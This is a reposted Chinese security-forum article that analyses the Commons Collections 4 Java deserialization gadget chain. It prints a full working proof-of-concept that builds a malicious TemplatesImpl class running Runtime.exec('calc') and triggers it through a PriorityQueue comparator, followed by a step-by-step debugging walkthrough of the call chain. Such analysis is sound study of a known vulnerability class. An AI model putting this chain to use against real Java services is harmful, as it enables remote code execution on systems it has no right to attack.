安全矩阵

 找回密码
 立即注册
搜索
查看: 2566|回复: 0

原创 | Java安全之CC4链

[复制链接]

181

主题

182

帖子

721

积分

高级会员

Rank: 4

积分
721
发表于 2022-4-9 09:38:32 | 显示全部楼层 |阅读模式
原创 | Java安全之CC4链
原创 Keefe  SecIN技术平台
2020-11-03 18:00

转载自https://mp.weixin.qq.com/s?__biz=MzI4Mzc0MTI0Mw==&mid=2247486050&idx=1&sn=0332989e1118a3809d9e059913b78339&chksm=eb875736dcf0de205627b21acd9ec772cf8243d53863511db440981606612a20b7d06e794612&mpshare=1&scene=23&srcid=04090lflK4eLjkuNw1RU3vJs&sharer_sharetime=1649467360422&sharer_shareid=ee83a55e0b955b99e8343acbb61916b7#rd

0x00 前言
继续来分析一波CC4的链,在写该文前,看到网上大部分的文章都只给了一个调用链和POC。其实看CC4调用链的时候,能看出来CC4的
调用链用到的也是前面的一些类去构造,只不过把CC2 和CC3的链给拼接了一下。

Java安全之Commons Collections2分析
https://www.cnblogs.com/nice0e3/p/13860621.html

Java安全之Commons Collections3分析
https://www.cnblogs.com/nice0e3/p/13854098.html

0x01 POC

  1. package com.test;
  2. import  com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
  3. import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
  4. import javassist.*;
  5. import org.apache.commons.collections4.Transformer;

  6. import org.apache.commons.collections4.comparators.TransformingComparator;
  7. import org.apache.commons.collections4.functors.ChainedTransformer;
  8. import org.apache.commons.collections4.functors.ConstantTransformer;
  9. import org.apache.commons.collections4.functors.InstantiateTransformer;


  10. import javax.xml.transform.Templates;
  11. import java.io.*;

  12. import java.lang.reflect.Field;
  13. import java.lang.reflect.InvocationTargetException;
  14. import java.util.PriorityQueue;
  15. public class cc4 {
  16.     public static void main(String[] args) throws IOException, CannotCompileException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException, NotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException {
  17.         String AbstractTranslet="com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";
  18.         String TemplatesImpl="com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";
  19.         ClassPool classPool=ClassPool.getDefault();
  20.         classPool.appendClassPath(AbstractTranslet);
  21.         CtClass payload=classPool.makeClass("CommonsCollections44444444");
  22.         payload.setSuperclass(classPool.get(AbstractTranslet));
  23.         payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec("calc");");
  24.         byte[] bytes = payload.toBytecode();
  25.         Object templates = Class.forName(TemplatesImpl).getDeclaredConstructor(new Class[]{}).newInstance();


  26.         Field field=templates.getClass().getDeclaredField("_bytecodes");
  27.         field.setAccessible(true);
  28.         field.set(templates,new byte[][]{bytes});

  29.         Field name=templates.getClass().getDeclaredField("_name");
  30.         name.setAccessible(true);
  31.         name.set(templates,"test");
  32.         Transformer[] trans = new Transformer[]{
  33.                 new ConstantTransformer(TrAXFilter.class),
  34.                 new InstantiateTransformer(
  35.                         new Class[]{Templates.class},
  36.                         new Object[]{templates})
  37.         };
  38.         ChainedTransformer chian = new ChainedTransformer(trans);
  39.         TransformingComparator transCom = new TransformingComparator(chian);
  40.         PriorityQueue queue = new PriorityQueue(2);
  41.         queue.add(1);
  42.         queue.add(1);
  43.         Field com = PriorityQueue.class.getDeclaredField("comparator");
  44.         com.setAccessible(true);
  45.         com.set(queue,transCom);
  46.         ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("test.out"));
  47.         outputStream.writeObject(queue);
  48.         outputStream.close();

  49.         ObjectInputStream inputStream=new ObjectInputStream(new FileInputStream("test.out"));
  50.         inputStream.readObject();




  51.     }
  52. }
复制代码


用网上的POC做了一个小小的改动。前面的一大段代码,在这里就不分析了,因为在CC2和CC3的链中,都是一样的。​​​​​​​
  1. Transformer[] trans = new Transformer[]{
  2.                 new ConstantTransformer(TrAXFilter.class),
  3.                 new InstantiateTransformer(
  4.                         new Class[]{Templates.class},
  5.                         new Object[]{templates})
  6.         };
  7.         ChainedTransformer chian = new ChainedTransformer(trans);
  8.         TransformingComparator transCom = new TransformingComparator(chian);
复制代码


CC4链中在这段代码中就做了一个简单的修改。

第一步是new了一个ConstantTransformer对象存储在Transformer[]数组中传入的参数是TrAXFilter.class。

如果调用到ConstantTransformer实例化对象的transform方法会直接返回一个TrAXFilter对象。

第二步new了一个InstantiateTransformer对象传入的是Templates.class和构造的恶意templates实例化对象。

第三步是使用了ChainedTransformer的修饰器将Transformer[]数组传入参数,当调用transform方法将给Transformer[]数组给遍历调用transform方法。

第四步将ChainedTransformer修饰后的对象再使用TransformingComparator修饰器给修饰一遍,这里再使用TransformingComparator来修饰一下,
这样等调用到该实例化对象的compare,方法的时候就会去遍历调用Transformer[]的transform方法。



​​​​​​​
  1. Field com = PriorityQueue.class.getDeclaredField("comparator");
  2.         com.setAccessible(true);
  3.         com.set(queue,transCom);
复制代码


这里反射获取PriorityQueue的成员变量comparator,然后设置PriorityQueue的comparator值为transCom。


其他的都和前面的一模一样,这里就不做具体分析了,感兴趣的可以去看看前面3条链的一个调试和分析过程。下面来做CC链的调试。


0x03 POC调试

该链中利用的也是通过PriorityQueue的readObject作为入口点。在该readObject复写点打个断点进行跟踪。



在readObject会调用到heapify方法。跟进一下heapify方法。



heapify方法会再去调用siftDown方法。



在这里如果comparator不为空,还会继续调用siftDownUsingComparator方法,comparator在这里是被修饰的Transformer[]数组。
前面使用反射去进行设置的。继续跟进siftDownUsingComparator方法。



到了这一步后,就会调用comparator的compare方法,在前面使用到了TransformingComparator来修饰,所有调用到TransformingComparator的compare方法。



在被TransformingComparator修饰前,还使用了ChainedTransformer修饰器进行修饰,在this.transformer为ChainedTransformer的实例化对象。
所以这里调用的是ChainedTransformer的transform。前面也提过该方法会遍历调用Transformer[]数组的transform方法。



在第一次遍历调用transform方法时i,因为前面Transformer[]存储的第一个是ConstantTransformer。ConstantTransformer的transform会直接返回TrAXFilter对象。

第二次调用的时候则是传入TrAXFilter调用InstantiateTransformer的transform方法。



这里的this.iParamTypes为templates,而this.iArgs为构造的恶意TemplatesImpl实例化对象。

那么这一步就是获取TrAXFilter为templates的构造方法。然后调用该构造方法实例化对象,并且传入TemplatesImpl恶意类。
跟进到TrAXFilter构造方法里面,查看一下具体实现。



在他的构造方法里面还会对传入的对象调用newTransformer方法。

此时传入的是恶意的TemplatesImpl实例化对象。调用的则是TemplatesImpl的newTransformer方法。继续跟进。



在该方法还会调用到getTransletInstance方法。继续跟进。



到了这里会判断_class为空的话就会去调用defineTransletClasses进行赋值。跟踪一下defineTransletClasses方法查看是如何赋值的。



_bytecodes对_class进行赋值。_bytecodes为Runtime类执行命令代码的字节码。在执行完方法后,来到下一步。



对_class进行newInstance,进行实例化对象。执行完这一步后,就会弹出计算器,也就是说执行了我们前面构造好的命令执行代码。



调用链​​​​​​​
  1. getTransletInstancePriorityQueue.readObject->PriorityQueue.heapify
  2. ->PriorityQueue.siftDown->PriorityQueue.siftDownUsingComparator
  3. ->TransformingComparator.compare->ChainedTransformer.transform
  4. ->TrAXFilter(构造方法)->TemplatesImpl.newTransformer
  5. ->TemplatesImpl.getTransletInstance->TemplatesImpl.defineTransletClasses
  6. ->(动态创建的类)cc4.newInstance()->Runtime.exec()
复制代码


0x04 结尾
在CC1和CC3里面只能在低版本执行,而CC2和CC4可以在1.8的版本下执行,调试CC1,3用的是JDK7u21版本,而2和4使用的是jdk8U181版本,亲测可用。

CC4的链在一开始并不想去做一个分析,因为和前面分析的链基本一样。但是还是需要把它给记录下来,也可以去加深一下影响。


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-30 14:50 , Processed in 0.013338 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表